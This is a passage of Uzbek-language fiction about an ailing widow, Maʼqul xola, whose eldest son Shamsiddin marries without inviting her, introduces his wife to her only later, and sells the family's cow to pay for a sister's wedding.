Меҳри бармоқларини онасининг лаблари устига қўйди. –Ўлимдан қўрқаман, гапирманг... –Бўпти, гапирмайман, – деди Маъқул хола ва яна  келин  мавзусига қайтди: –Келиннинг қандай бўлиши акангга боғлиқ, Шамсиддин мени хўрласа, келиним ундан ўтказади. Шамсиддинга ишонмаганим учун келиндан қўрқяпман. Аканг мазах қилаверса, хотини ҳам ўрганади-да, яна ким билади дейсан... –Қўрқманг, акам энди бизлар билан яшамайди. –Олдиндан бир нарса дейиш қийин, аканг амакингникида вақтинча туради, улар ҳам жўжабирдай жон.  Сигирнинг пули етса, акангга уй олиб берардим, афсус, сотадиган бошқа ҳеч вақомиз йўқ-да. –Сигирни сотсак  ҳолимиз нима кечади?–онасининг гапидан ажабланди Меҳри. –Аста-секин пул йиғиб яна  сигир олардик, акангга уй жуда зарур. Меҳри онасини сира тушунмайди: акаси ҳам, Бодом опаси ҳам уни одам ўрнида кўрмай, ҳар гапидан хато излаб силташади, онаси уларнинг таъзирларини бериш ўрнига хушомад қилгани қилган. Мана, бугун  оғзини оқартириб турган сигирини сотиб, Шамсиддинга уй олиб бериш ҳақида ўйлаяпти. Меҳри кўнглидан кечган фикрларни юзага чиқарди. –Она, Шамсиддин акамдан гоҳ нолийсиз, гоҳ унинг раҳмини ейсиз. Қандай яшаса яшайвермайдими, нима ишингиз бор? Уй олиб беришингизга арзимайди у. –Эҳ, болам,–деди Маъқул хола. –  Она бўлганингдан кейин ҳаммасини тушунасан.  Аканг ичимдан тушган чаёним. Чақса ҳам ўзимники.            –Она ва қиз нималар ҳақида гаплашяпсизлар? –идиш-товоқларини ювиб келган Санам уларнинг суҳбатини бўлди. Маъқул хола ҳам, Меҳри ҳам бир неча дақиқа олдин бўлиб ўтган воқеани унутиб, шунақа самимий суҳбат қуришаётган эдики, Санам бир неча дақиқа олдинги хафагарчиликни сезмади ҳам. Шу сабабли Меҳри ҳазил аралаш савол берди. –Акам ҳақида. –Ғийбатими ё тўйими? – кулимсираб сўради Санам. –Ҳар иккиси ҳам, –жавоб қайтарди Меҳри. Улар ҳали  суҳбатларини тугатмаган  эдиларки,  Бодом кириб келди. –Кеч қолдингиз, опа, –деди Санам. –Эртага келсангиз керак, деб ўйлагандим. –Тўрт пара ўқидик, кейин автобус кутдим. Қорним очқаб кетди, овқатинг тайёрми? –Ҳа, юра қолинг, совиб қолгандир. Опа-сингил  нариги уйга ўтишди. Меҳри онасининг тиззасига бошини қўйиб хаёл суриб ётганича уйқуга кетди. Тун тинч ва хотиржам ўтди.   ХХХ   Ҳамма учун одатдаги кунлардан бири сифатида бошланган чоршанба Маъқул холанинг бутун борлиғини қарама-қарши туйғуларга кўмиб ташлади. Тўйга боришдан умидини узган Меҳри мактабга, қолганлар ясан-тусан қилиб амакилариникига кетишди. Кенг ҳовлида танҳо қолган аёл ўзини чалғитиш учун кир ювди, ҳовлини супурди, барибир боласининг тўйини кўролмаслик  алам қилди унга, айниқса, куннинг иккинчи ярмида безовталиги ошиб, ўзини қўярга жой тополмай ҳали  кўчага чиқди, ҳали уйга кирди. Мактабдан қайтган Меҳри онасининг ҳолатини кўриб аввалига дарди қўзғаяпти, деб хавотирга тушди, аммо кейин сездики, унга тўйга бормагани таъсир этган. Меҳри онасининг қўлидан ушлаб уйга олиб кирди-да, чалғитиш учун телевизорни қўйди. Маъқул хола телевизорга қарамади ҳам, тиззасига тирсакларини суяб кафтларини пешонасига  тираганича маъюс ўтирди. –Қизим, – деди бир пайт Меҳрига. – Мабодо акангга инсоф кириб, мени чақиртирмасмикин? Балки амакинг одам юборар, ҳеч кимга сездирмай  узоқдан томоша қилардим, ўғлимнинг куёв бўлганини кўргим келяпти. Меҳрининг онасига раҳми келди. Чиқмаган жондан умид, деб шуни айтадилар-да, ҳали ҳам тўйдан умидвор экан. –Она, юринг, тўйга ўзим олиб бораман, – Шу топда қўрқув ҳисси Меҳрини тарк этган, фикри-зикри онасини қувонтириш эди. –Қўй, тўй бузилмасин мени кўрса акангнинг кайфияти тушади. –Тўй бузилмайди. Акамга кўринмай бир четда ўтирамиз. –Йўқ, бормайман. Маъқул хола бир оз уйланиб турди-да, соатга қаради. –Ҳадемай келинга боришади,  соат  учдан ўтибди. У энди ёш боладай йиғлай бошлади, Меҳри онасини қандай овутишни билмай қўшилиб йиғлади. Она-бола узоқ йиғладилар, ниҳоят Маъқул хола ўзига келди. –Мени деб сен ҳам тўйдан қолдинг, боришинг керак эди, Малика момонгни чақириб ўтираверардим. –Боргим келгани йўқ, она. Меҳридаги тўйни, янгасини кўриш иштиёқи онасига бўлган меҳри олдида тумандай тарқаган, унинг  учун онадан олдинда турадиган нарсанинг ўзи йўқ эди. Кутилмаганда Маъқул хола шитоб билан ўрнидан турди-да, ошхонага ўтди.  Ўчоққа олов ёқиб, тушда пиширган овқатини иситди. Меҳри хавотирланиб унинг ортидан борди. Овқат исигач, иккита косага сузиб, уйга олиб кирди. –Қорнингни тўйдириб ол, бир жойга борамиз,–деди у. –Қаёққа борамиз? –Кейин биласан, овқатингни ич. Она-бола овқатланишгач, дарвозани қулфлаб, йўлга тушишди. Атрофга оқшом қўна бошлаган, Меҳри шахдам қадам ташлаб кетаётган онасидан ортда қолмаслик учун тез-тез юрарди. –Қаерга боряпмиз, она? – сўради у. –Савол бермай юравер. Улар қишлоқ кўчаларини ортда қолдириб, катта асфальт йўлга чиққач, бир оз юриб чапга бурилганларида  қоронғилик қуюқлашганди. Кўп ўтмай қулоқларига мусиқа садолари чалинди. –Она, тўйга боряпмизми? –  сўради Меҳри кўнгли ниманидир сезиб. –Ҳа, лекин ичкарига кирмаймиз, узоқроқдан томоша қиламиз. Энди мусиқа садолари аниқ эшитилди. Меҳри амакисининг уйига сира келмаганди, шу ерда экан-да, деб қўйди. Ниҳоят ёруғ тушиб турган дарвоза  олдида   одамлар кўриниб, ғала-ғовур эшитилди. –Амакингнинг ҳовлиси ўша ерда,–деди Маъқул хола одамлар тўпланиб турган жойга ишора қилиб. –Қоронғида бизга эътибор беришмайди, юр, сал яқинроқ борамиз. Улар тўйхонага яқинлашдилар, афтидан ҳамманинг нигоҳи дарвоза яқинига тўхтаб турган машинага қадалган, келин келганди. Сал ўтмай эгнига тўн, бошига дўппи кийиб, белига белбоғ бойлаган  Шамсиддин кўринди. –Болагинамдан ўргилай, қара, куёв бўлди, –Маъқул хола йиғлаб юборди. –Аллоҳимга шукур, вақтида етиб келибмиз Бир зумда дарвоза олдида гулхан ёқилди. Шамсиддин келинни даст кўтариб, оловдан уч марта айлантирди ва ичкарига олиб кириб кетди. Маъқул хола ҳануз йиғлар, кўзидан ҳам қувонч, ҳам алам ёшлари оқарди. –Она, энди қайтамизми? –сўради Меҳри. –Яна бирпас қарасакмикин. –Ҳовлининг ичи кўринмайди-ку ё тўйга  кирамизми? –Йўқ, кирсак аканг ранжийди, бирпас қўшиқ эшитайлик, кейин кетамиз. Улар ярим соатлар шу ерда туришди. Даврабон тўйни очиб, кимгадир сўз берди, сўнг санъаткорлар хониш қилишди. –Кетдик, –деди ниҳоят онаси Меҳрига. – Кетдик. Энди армон қилмасам бўлади, сенинг қарзингдан қутулдим. – Қанақа қарз, она? – Меҳри савол назари билан Маъқул холага қаради. У жавоб бермади, афтидан Меҳрининг тўйдан қолганини назарда тутаётган эди. Маъқул хола йўл-йўлакай ўзига-ўзи гапириб борди...   ХХХ   Қўчқор қассобнинг икки қизи турмушга чиқиб, ўзидан тинган, Норхол билан ёлғиз ўғли қолганди. Шунинг учун тўйдан кўп ўтмай  бир пайтлар шаҳардан олиб қўйган икки хонали уйини ёшларга берди ва енгил тортди. “Қизларим бировнинг хасми, битта ўғлимга шу ҳовли-жой ҳам етади”, деб ўйлади у. Маъқул холага Шамсиддинга қайнотаси уй бергани ҳақидаги хабарни Бодом етказди. –Икки хонали уй экан, шундоққина шаҳар марказида, менинг ўқишимга яқин, –деди у худди ўзи уйли бўлгандай қувониб. –Аканг хурсандми? – кўнгли негадир ғашланиб савол берди Маъқул хола. –Акамнинг хурсандлигини ҳам, хафалигини ҳам билиб бўлмайди, доим бир хил – жиддий юради. Лекин янгам жуда яхши, кўнгли очиқ, қўли ҳам.  Сиз талабасиз, деб менга икки марта йўқ деганимга қарамай пул берди. Энди бизнинг уйда турасиз, деб қўймаяпти. –Акамникида турасизми? – сўради Санам. –Ҳа, айтдим-ку, янгам қўймаяпти деб, кийимларимга келдим. –Аканг нима дейди? –гапга аралашди Маъқул хола. –Хотини, келинг, деганидан сўнг акам нима дерди, рози. –Улар ёш келин куёв бўлишса,  сенга нима бор, уялмайсанми? –Уйлари уч хонали экан, биттасини менга беришяпти, бормасам, янгам хафа бўлади, мени фаросатсиз, деб ўйламанг, тил учида айтилган гап билан юракдан айтилганининг фарқига бораман. –Ҳозир кетмоқчимисан? Қачон келасан? –Маъқул холага барибир  Бодомни акасининг уйида яшаши ёқмаётган эди. –Пахтага кетмасак, келаман. –Пахтага боришингдан олдин кел, –тайинлади Маъқул хола. –Опа, бизни ҳам акамникига олиб боринг, янгамни кўриб келамиз, – Боядан бери уларни  тинглаб ўтирган Санам сўз қотди. –Аввал жойлашиб олай, кейин кўрамиз. ...Бодом шу кетганича икки ойдан ортиқ қорасини кўрсатмади, Шамсиддин унинг пахтада эканини айтганди, Маъқул хола ишонмади. –Ёлғон гапирасан, –деди ўғлига. –У пахтада эмас, яшириб қўйибсан, топиб бер. Шамсиддин, сенга гапиришнинг фойдаси йўқ, дегандай жўнаб қолди. Маъқул хола унинг орқасидан  анча жойгача жавраб борди: –Бодом сеникида нима қилади, уйга юбор, бугуноқ қайтариб юбор... Орадан икки ойлар чамаси вақт ўтиб, якшанба куни тушга яқин Бодом бир қиз билан кириб келди. Маъқул хола  ўтирган жойидан туриб кетди, қувонганидан бир пой калишини кийишни ҳам унутиб қизини қучоқлаб олди. –Шунчалик бағри тош бўласанми? –гина қилишга тушди у. – Келмаганингга икки ойдан ошди. –Чўлда пахтага  эдим,  ўзи кеча келдик. –Алдайсан. Сен ҳам акангга ўхшаб ёлғончисан, пахта-махтага борганинг йўқ, акангникида яшириниб ўтирибсан. –Ишонмасангиз ишонманг, –деди Бодом. –Юзимни қорайиб кетганини кўрмаяпсизми?  Ҳамма семирибсан, деяпти, уззукун булка нон билан макарон шўрва ичгандан кейин семираман-да. Сочим ҳам тўкилгани тўкилган, чўлнинг суви ёқмади. –Бу қиз ким? –сўради Маъқул хола. –Дугонам,  бирга ўқиймиз. Бодом сингилларига кўзини қисиб қўйди. Маъқул хола барибир хурсанд эди, қизи билан дугонасини ўтқизишга жой тополмай, ҳали у кўрпачани солади, ҳали бу кўрпачани. –Дугонанг ширингина қиз экан, илгари ҳеч қўрмагандим, – деди Маъқул хола. –Бошқа қишлоқда яшайди, шунинг учун кўрмагансиз. –Қизимжон, ўтиринг, бир пиёладан чой ичинглар,– Маъқул хола Бодомнинг  дугонасига мулозамат кўрсатди. Қиз нима қилишини билмай Бодомга қаради, у аёлнинг илтифотидан ноқулай аҳволга тушган ва кўнгли учун бирпас ўтиришни истаётганди-ю, Бодомдан ўтиб фикр билдиролмаётганди. –Биз кетамиз, қишки кийимларимни олиб чиқ, – Санамга буюрди Бодом. Маъқул хола қанча қистамасин, у ўтирмади, кийимларини олгани заҳоти йўлга тушди. –Бирпас ўтирмади-я, ноинсоф, – деди Маъқул хола унинг ортидан термилиб қоларкан ранжиганини сездириб, – Мени-ку ёмон кўради, лоақал сизлар билан бир пиёла чой ичса бўларди, дугонаси ҳам қуруқ оғиз кетди.. – Она, –Санам секин сўз  бошлади,  – опамнинг ёнидаги дугонаси эмас, янгам. –Янганг?! – ҳайрат билан сўради Маъқул хола. – Қанақасига янганг? –Шамсиддин акамнинг хотини-да. –Қаердан билдинг, Бодом айтдими? –Тўй куни кўргандим, ҳамма, келиннинг юзида нори бор экан, деганди, бир кўргандаёқ танидим, Бодом опам ҳам кўзини қисиб қўйди. – Нега олдинроқ айтмадинг? Маъқул хола ирғиб ўрнидан туриб, уларнинг ортидан чопди ва овозининг борича чақирди: –Бодом! Бодом! Қайт! Қайтинглар! Янгангга атаганим бор! Қайтинглар! Маъқул хола чопиб бораверди, олдин секин, кейин тез югурди. Келини бир қайрилиб қараганди, Бодом унинг қўлидан тортқилаб кетди, қишлоқнинг катта йўлига чиқишгач, автобусга ўтириб олишди. Маъқул хола  маъюс  тортиб ортига қайтганида қизлари дарвоза олдида кутиб турарди. У ҳеч нарса демай ичкарига кириб, сандиғини очди ва келинимнинг кўрманасига, деб атаб қўйган чиройли ялтироқ матони олиб ғижимлаб ташлади, аламини олмоқчи бўлиб, икки учидан икки томонга тортди, мато чўзилди-ю, йиртилмади. Жаҳлига чидолмаган Маъқул хола  қайчи билан қийма-қийма қилди ва қийқимларни тандирга ташлаб, ёқиб юборди. Болаларининг бирортаси унга қаршилик кўрсатмай, жимгина кузатиб турди. Қийқимлар жизғанак бўлгач, Маъқул хола ерга ўтириб олди-да, уввос тортиб йиғлади: – Эй, худо! Менинг гуноҳим нима?                                                                                              ХХХ   Шу воқеадан беш-олти кун ўтдими, Маъқул хола аниқ эслолмайди, ҳовлидаги тезакларни ёмғир ёғса ивиб қолмасин, деб сомонхонанинг бир четида жойлаётган эди, дарвоза тақиллиб қолди ва уй эгаларининг чиқишини ҳам кутмай тугун қўтариб олган икки аёл кўринди. Маъқул хола дарвозага яқинлашгач, қирқ-қирқ беш ёшлар чамасидаги аёл билан бирга тунов куни Бодом дугонам деб таништирган қизга кўзи тушди. Бирданига Санамнинг, опам билан келган қиз янгам бўлади, деган сўзларини эслади ва миясидан, Шамсиддиннимнинг хотини, келиним, деган фикр ўтди-да, юраги гуп-гуп уриб, нима қилишини билмай қолди. Ўтган сафар келганида у сочларини турмаклаб, бошяланг бўлиб олганди, ҳозир келинлиги билинган, чиройли пушти ранг рўмол боғлаган, эгнидаги гулдор ялтироқ кўйлаги ҳам ўзига ярашган, тунов куни этибор бермаган экан, келинчакнинг юзидаги билинар билинмас сепкили ҳам унга чирой бериб турар, ўнг чаккасида нори бор эди. Маъқул хола иккиланди: бу келинчак Санам айтганидай Шамсиддиннинг хотиними ё бегонами? Санам  адашган бўлса-чи? – Сиз ... Сиз ... Маъқул хола дудуғланди, келиниммисиз, демоқчи эди, саволи бемаънидай туюлиб, тилини тишлади, унинг ҳолатини келинчак ҳам, ёнидаги аёл ҳам сезди, ўртадаги ноқулайликка барҳам бериш мақсадида нотаниш аёл сўз бошлади. –Бу ўғлингизнинг турмуш ўртоғи, келиниингиз бўлади. Исми Норхол. –Келиним... Менинг келиним... Тушимми, ўнгимми? Маъқул хола ўзини йўқотиб қўйди, сўнг қучоғини очиб, келинини бағрига босди, пешонасидан ўпиб, дуо қилди. –Барака топинг, кам бўлманг, касал қайнонангизни сўраб келибсиз, сизни худо сўрасин. Мени одам ўрнида кўрганингиз учун раҳмат сизга. Минг раҳмат. –Сизни йўқлаб келиш унинг бурчи, – деди келинчакнинг ёнидаги аёл. – Баумид ўғил ўстиргансиз, келин туширгансиз, аллақачон йўқлаши керак эди. Ёшлигига бориб ўтган сафар сизни хафа қилиб қўйибди, дадаси роса қойидилар. Сизларни таништирай, ҳам узр сўрасин, деб олиб келдим. –Сиз келинимнинг... –Онаси бўламан, –Маъқул холанинг сўзини давом эттирди аёл. –  Қудангизман. –Қудам... Келинимга ўхшар экансиз... Икки қуда қайтадан қучоқлашиб қўришдилар. –Тунов кунги воқеа учун келинингизни кечиринг – деди аёл. –Қайси воқеа? Ҳа, ҳа, эсладим. Келинимдан хафа эмасман, келинимнинг айби йўқ, фақат танимаганим учун ўзимдан, танитмагани учун Бодомдан жаҳлим чиқди,  қаттиқ хафа бўлдим, Бодомдан хафа бўлдим. Маъқул хола меҳмонларни уйга бошлаб, кандил дастурхон тўшаркан, Бодомдан хафа эканини тинмай  такрорларди: –У менга билдирмади, келинингиз демади, хафа қилди, орқасидан югурдим қайрилиб ҳам қарамади, келин қарагандилар, қўлларидан судраб олиб кетди, у мени хафа қилди. –Келинингиз сиз учун атайлаб сомса пиширибди, иссиққина, еб олинг, –қуда аёл гапни бошқа мавзуга бурди. –Биз ҳозиргина едик, аччиққина чой бўлса, бирпас гурунглашиб ўтирамиз, бошқа ҳеч нарса керакмас. Кекса қайнонаси ҳузурида меҳмондай ўтириш ноқулай эди, келинчак ўрнидан қўзғалди. –Мен чой дамлаб келаман. –Сиз бугун меҳмонимсиз, болам,– Маъқул хола йўл бермади унга. –  Ўтиринг, насиб этса, тўйларда хизмат қиласиз. Қайнонангизни касал деб эшитгандирсиз, аммо бақувватман, ўнта ёшнинг ишини бажаришга кучим етади. Келинчак онасига қаради, у ўтирақол, дегандай ишора қилди. Маъқул хола чой дамлашга чиқиб кетди. –Одамлар оёғи билан эмас, оғзи билан юради, –аёл қизига қаради. –Қайнонанг жуда улар айтганчалик эмас, гаплари яхши-ку. Девдай хотин экан, билаклари устундай.  Қизи келиб келинини дугонам, деб таништирганидан кейин соғ одам ҳам жинни бўлади-да, ҳали ҳам шўрлик иродали экан. –Ҳар замонда дардлари тутиб қоларкан, кўпинча ўзларига ўзлари  пичирлаб юрарканлар. Шамсиддин ака, баъзан онам шунақа ақлли гапирадики, соғлар ҳам ундай фикрламайди, дейдилар. –Худо берган дард, киши олтмишга киргунча остига қараши керак. Ҳар кимнинг охирини берсин, ўзимиз охирида нима бўлишимиз, ёлғиз  худога аён.  Қайнонангни ҳам бир пайтлар жуда яхши аёл эди, дейишади.   Маъқул хола баркашда қанд-қурс, чой кўтариб келиб, она-боланинг суҳбати бўлинди. – Қуда, овора бўлманг, биз қайтамиз, шунчаки бир кўриб кетайлик, дегандик. –Овораси борми, от билан туя сўйган бўлсайканман. Билганимда сал бошқача кутиб олардим. –Ҳаммаси жойида, келинг, ўзингиз ҳам ўтиринг. –Бўлди, ўтираман,  аксига олиб қизлар ҳам мактабда эди. Икки қуда анчагача у ёқ, бу ёқдан гаплашиб ўтиришди. Маъқул хола овқатга уннамоқчи бўлганди, қудаси қўймади. –Исрофгарчиликнинг кераги йўқ, қудажон. Сиз билан биз энди бегона эмасмиз, сомсадан ҳам тузук емадингиз, шундай турибди. Биз энди борайлик, –Бирпас ўтирганларингда қизлар келишарди, янгаларини кўриб жуда қувонишарди. –Бундан кейин келаверади, ўзингиз ҳам  уларни олиб боринг. Албатта, боринг. Маъқул хола келинига олиб қўйган матони шошқалоқлик билан йиртиб ташлаганидан афсусланди, келини келганидан бўён кўрманага нима бераман, деб ўйлагани ўйлаган, аксига олиб бисотида тузукроқ матоси йўқ, бозор яқин бўлса экан, югуриб бирор нарса олиб келса, йўқса куни кеча пенсия олган, пули бор. Пенсияси эсига тушиши билан Маъқул холанинг юзи ёришди, хаёлига келган фикрдан қувониб, югуриб уйга кирди-да, пул олиб чиқди. –Бу сизга, – деди келинининг қўлига пулни тутқазаркан, – ўзингизга бирор нарса оласиз. –Йуғ-е, керакмас, –  Норхол хижолат бўлганини яширмади.  – Керакмас. –Унақа қилманг, қуда, пули бўлса, у сизга бериши керак. –Олмасалар хафа бўламан, кўз очиб кўрган биринчи келинимни шундай жўнатаманми? Бу пул табаррук, пенсиямдан, худо сизни ҳам пенсияга етказсин, мендай қариб юринг. Ноилож қолган Норхол пулни олди. Улар кетгач, мактабдан қайтган қизларига келини ва қудаси ҳақида тўлиб-тошиб гапириб берди Маъқул хола.   ХХХ   Болалари улғайган сари Маъқул холанинг ташвиши кўпайди. Олган нафақаси рўзғордан ортмайди, яхши ҳамки, ҳовлиси катта, картошка, пиёз экади, эри раҳматли оғил қуриб кетган, ўшандан бўён уйларидан сигир аримайди. Маъқул хола ҳар эрта молини подага қўшиб,  даладан ўт ўриб келади-да, қуритиб хашак қилади ва сомонхонанинг бир четига бостириб қўяди. Буғдой ўримидан кейин ғаллазорларда қолиб кетган сомонларни  йиғиб келишни ҳам унутмайди. Ҳар тугул болаларининг бири бўлмаса бири унга кўмаклашади, озуқа ғамламаса, қишга бориб бир боғ беда фалон пулга чиқиб, қийналиб қолишларини ҳатто кичкина Меҳри ҳам билади. Сигир борлиги учун рўзғордан сут-қатиқ узилмайди, пулни ушлаб туради ва муҳими, ҳар йили туғиб беради. Пулга зарурат туғилса, Маъқул хола бузоқни сотади. Бодом техникумни битирар йили Ғайбиддин мактабни битирди. Шамсиддин уни Тошкентга олиб бориб, қурилиш техникумига жойлаб қўймоқчи бўлди, кетишидан бир кун олдин онасининг уйига кириб, ҳе йўқ, бе йўқ, ғунажиннинг ипини еча бошлади. –Ҳа,–деди югуриб келган Маъқул хола. –Нима қиляпсан? –Ғунажинни сотаман харидор топдим. –Нега сотасан? Ҳали жуда кичик, индама, бир оз боқайлик, кейин сотамиз. –Ўғлингни Тошкентга олиб бориб, ўқишга жойлайман, Тошкентга пиёда бориб бўлмайди, менга пул керак. Маъқул хола бўшашиб қолди, олиб борма, деса уни билмайди, олиб бор, деса ғунажинни кўзи қиймайди, бирпас иккиланиб турди, унинг ақли тиниқ пайт эди, Шамсиддинга қарши бориб ҳеч нарсага эришмаслигини тушунди. –Унда ўзинг биласан, –деди бўшашиб. –Бир оз боқсак, яхшироқ пулга сотардик. Майли, ҳадемай сигир туғса, ғунажиннинг ўрнини босиб кетади. Маъқул хола Шамсиддиннинг укаларига яхшилиги кўплигини билади: Бодом диплом олди, катта шаҳарда ўқиб, катта одам бўлсин, деб Ғайбиддинни Тошкентга техникумга киритиш ҳаракатида юрибди, ёлғиз ўзи ишласа, хотини ёш боласи билан ишлолмаса, қандоқ ҳам етказсин,  мен битта ғунажинни қизғаниб ўтирибман,  деб ўзини ўзи койиди ва ғунажин воқеасини унутди.  Бироқ орадан икки-уч ҳафта ўтиб рўй берган кўнгилсизлик Маъқул холани яна гангитиб қўйди, ўша куни у болаларини мактабга жўнатиб, ҳовлида у-бу юмушларни бажараётганди, кутилмаганда кириб келган Шамсиддинга кўзи тушиб қувончи ичига сиғмади, уни Тошкентдан қайтганидан бўён кўрмаганди. –Укангни қўйиб келибсан, қаерга жойлаштирдинг? –сўради ўғлидан. –Ётоқхонага.  Бир йўла имтиҳонларини топшириб қайтади. –Ким билан турибди? Пули борми? Овқатини қандай пиширади? –Қўрқма, боланг оч қолмайди, –деди Шамсиддин ва оғил томон ўтиб, сигирнинг арқонини еча бошлади. –Нима қиляпсан? Сигирни қаёққа олиб борасан? Шамсиддин  лом-мим демай ишини қилаверди. –Сигирга тегинма, оғзимизни оқартириб турган битта-ю битта шу мол қолган, эрта-индин туғса, сут-қатиқ ичамиз, укаларингга раҳминг келсин. –Сотмоқчиман, менга пул керак –Шамсиддин сигирни дарвоза томонга  етаклади. Ўғлининг гапидан Маъқул хола қаҳрланди ва йўлини тўсди. –Сотмайсан! Сотмайсан! Сотгани қўймайман! Ғунажинга индамагандим, сигирни сотгани қўймайман! –Йўлимдан қоч! –Шамсиддин онасини силтаб ташлади ва кетаверди. Маъқул хола йиғлаб, Шамсиддиннинг қўлидан ушлади, у энди ялинишга тушди: –Жон болам,  сигирга тегинма, озроқ сабр қилсанг туғади, бузоғини сотасан. –Сабр қилишга вақтим йўқ, Бодомни эрга беряпман, менга пул керак. Сигирни сотмасам, унга қаердан сеп олиб, тўйни қандай ўтказаман? Энди мени тушундингми? Маъқул хола  тушунди, нима қиларини билмай ҳовлининг тўрт томонига умидвор термилиб, сотишга арзигулик буюм излади-ю, ҳеч нарса тополмади, бисотида сигирдан бошқа ҳеч вақоси йўқ эди. У ўғлига бас келолмаслигини билиб, секингина сўради: –Бодомни кимга турмушга беряпсан? Синашта жойми? Шамсиддин онасининг саволини эшитмагандай сигирни эргаштириб кўчага чиқиб кетди... Болалар мактабдан қайтиб, уйда ҳеч ким йўқлигидан ажабланишди, негаки, бу пайтда оналари уларни кутиб ўтирган бўларди. Санам онасини қидириб кўчага чиқди, сўнг Малика момонинг ҳовлисига ўтди. –Онангни излаяпсанми? – сўради момонинг катта набираси. – Ҳа, дарвоза очиқ, аммо ҳеч ким йўқ. – Онангни касали қўзғаганга ўхшайди.  Биринчи бригаданинг шийпони олдида кўрдим,   кимнидир қарғаб кетяпти. Санам уйига келиб, синглисига воқеани айтганди, Меҳри маъюсланиб қолди, бу пайтда молхона томонга ўтган  Хайрулла, оғилда сигир йўқ, деб келди. Меҳри билан Санам ўша томонга югурдилар, бир пайтлар беш-олтита мол боқилган оғил ҳувиллаб ётар, бир чеккада сигирларининг қозиғи сўппайиб турарди.  Санам Меҳрига қаради, Меҳри Санамга. Ҳар иккиси  улар йўқлигида нимадир бўлганини фаҳмлашди. –Бу акамнинг иши, – пичирлади Меҳри. –Билмасдан гапирма, –уни койиди Санам. –Акамдан бошқа ҳеч ким бу ишни қилмайди, – сўзида туриб олди Меҳри. Улар кўчага чиққанларида Хайрулла икки ҳовли наридаги қўшнилари Ваҳоб ака билан суҳбатлашаётган экан. –Амаки,  оғилдан сигиримиз ғойиб бўлибди, эрта-индин туғади деб подага қўшмаётгандик, мабодо кўзингиз тушмадими? –Сигирни аканг олиб кетаётганини кўргандим, –деди Ваҳоб ака. – Сотмоқчига ўхшайди. Меҳри, айтмадимми, дегандай опасига қаради ва ҳафсаласи пир бўлиб ҳовлига кирди, Шамсиддиннинг қилмиши Маъқул холага ёмон таъсир қилган кўринади, ахир бутун оила аввал ой санаб, кейин кун санаб сигирнинг туғишини кутаётганди. –Акам нега бунақа, опа? –жаҳл билан сўради Меҳри. –Бир ой олдин бузоқни сотганди, энди сигирни. Ишқилиб онамни урмаган бўлсин-да. Меҳрининг кўнглига ғулғула тушди, Санам қанчалик қистамасин, тушлик ҳам қилмай, кўчада ўтирганича уйга кирмади, онасини кутди. Кечга яқин Маъқул хола қайтди, болаларининг бирортаси чурқ этиб сигир хақида сўрамади, анчадан кейин ўзи  ёрилди: – Аканг сигирни олиб кетди, опангни эрга берармиш. Кимга бераётганини айтмади ҳам. Бодомнинг тўйи ҳам менга насиб қилмайдиган кўринади. У кўзларини юмганди, икки томчи ёш думалаб тушди...   ХХХ   Маъқул хола шу хонадонга келин бўлиб тушганидан бўён ҳовлиларидан сигир аримаган, эри раҳматли пулга муҳтож пайтлари молларини сотганида ҳам “кўнарги”га деб ҳеч бўлмаса бузоқча қолдирарди. Молларга ҳали ем бериб, ҳали сув бериб, дам соғиб, дам тагини тозалаб вақтининг қандай ўтганини  сезмасди у. Энди эса... Баъзан молининг сотилгани хаёлидан кўтарилиб ем берар вақти ирғиб ўрнидан туради-да, молхонага киради ва бўм-бўш қозиқни кўриб юраги “шув” этиб кетади. Шунга қарамай Шамсиддинни айбламайди, укаларини ўқитяпти, синглисининг бошини топиб узатяпти, шунисига ҳам шукур, худо тақдир қилган куни яна сигирли бўламиз, деб ўзини ўзи овутади. Кўп ўтмай Маъқул хола Бодом ҳақидаги маълумотларни билиб олди: у янгасининг  қариндошига турмушга чиқаётган экан. Кўнглидан ўтгани бўлди: унга қизининг тўйида қатнашиш ҳам буюрмади, Бодом Шамсиддиннинг уйидан чиқди. Маъқул хола  энди бундай кўргуликларга кўниккан ва  ўзини тутиб олганди. Одатдагидай Меҳри опасининг тўйига ҳам боришдан воз кечди, онасини ёлғиз қолдирмади. Санам билан Хайрулла тўйдан бир кун олдин акасиникига кетиб, икки кундан кейин қайтишди. –Опамнинг ҳовлиси жуда кичик экан, – деди Санам тўй таассуротларини айта туриб. – Лекин уйлари чиройли таъмирланган, опамга болохонани беришибди. –Илоё бахтли бўлсин, –Маъқул хола қизини дуо қилди. – Бодом мени ёмон кўрсаям бир жоним унинг ичида. –Акамнинг ўғилчаси катта бўлиб қолибди, – сўзида давом этди Санам. – Бирам ширинки, қараб тўймайсиз, янгам, бирор кун  сизларникига борамиз, дедилар. Меҳри опасини нуқиб қўйди, набираси ҳақида эшитган Маъқул хола кўзларини бир нуқтага қадаб қолганди. У Шамсиддиннинг хотинидан жуда миннатдор эди, келини вақти-вақти билан бирор бир тансиқ таом пишириб уни йўқлаб турарди, бироқ  фарзанд кўрганидан бўён келгани йўқ. Келинининг кўзи ёриганини эшитгач, ўзи бормасаям чиройли кийимча солиб суюнчи юборди. Ўшанда Меҳри онасини, сиз ҳам юринг, деб кўп қисталанг қилди, аммо унамади, унга ўз уйи оловдай кўринар, бошқа жойга боришни хоҳламасди. Унга: “Бормайман, ўзинг боравер, кимга керак бўлсам шу ерга келсин”, деди.  Меҳри онасига гапирганига пушаймон еди, у қизлари кетгунича ўзига ўзи гапириб юрди: “Керак бўлса ўзи келсин, бормайман, у мени уради”. Онасининг гаплари ўзгарганини кўрган опа-сингил индамай акасиникига кетишди. Ҳозир Санамнинг сўзларини эшитиб юраги тўкилиб кетган Маъқул хола ҳали сира кўрмаган набирасини соғинаётганини ҳис этди. –Болаларим ўзларидан кўпайишсин,  ҳеч бирининг тақдири меникига ўхшамасин. Унинг кўзларида ёш айланди. Шу билан Бодомнинг тўйи ҳақидаги гапга нуқта қўйилди ва Маъқул хола ўрнидан туриб, молхонага қараб кетди. Меҳри билан Санам бир-бирларига маъноли қарашди, Шамсиддин сигирни олиб кетганидан бўён у беихтиёр молхонага кириб,  ўзига-ўзи гапириб ўтирадиган одат чиқарганди. Бир гал Меҳри уни оғилда тимискиланиб юрганини, бир боғ бедани охурга ташлаб, ол, жонивор, е, қорнинг очқагандир, деяётганини эшитиб, акасидан ранжиди. Сигир онаси учун катта эрмак эди, моллари сотилгач, унинг кўчага чиқиб кетиши кўпайди ва эс-ҳуши жойида пайти фақат сигир сотиб олиш ҳақида гапирадиган, фақирона рўзғоридан қисиб, нафақа пулларидан бир қисмини мол сотиб олиш учун яшириб қўядиган бўлди. Онасининг аҳволини кўрган опа-сингил унга ёрдам бериш илинжида жияк тикишга киришди, Санам билганларини Меҳрига ўргатди 